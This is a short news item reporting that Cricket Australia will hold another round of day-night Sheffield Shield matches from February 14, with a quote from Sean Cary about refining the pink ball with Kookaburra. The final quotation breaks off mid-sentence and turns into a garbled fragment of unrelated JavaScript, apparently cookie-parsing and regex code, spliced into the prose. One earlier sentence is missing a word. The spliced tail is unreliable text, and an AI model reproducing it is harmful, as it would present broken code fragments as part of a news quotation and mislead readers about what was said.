Cricket Australia has confirmed that will be another round of day-night Sheffield Shield matches this season.

The second lot of pink ball Shield clashes will begin on February 14 next year.

The decision was made on the back of the highly successful day-night Adelaide Test, where crowd numbers and television audiences dramatically rose.

“The public's response to the first day-night Test was overwhelmingly positive and we've now had some time to evaluate feedback from everyone involved in the match,” CA's head of cricket operations Sean Cary said.

“As we look ahead to future international seasons and the prospect of playing more Test cricket under lights, we want to give our players more opportunities to play with the pink ball.

“These (Shield) matches will be used as part of our work to keep refining the ball in close consultation with Kookaburra,” "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
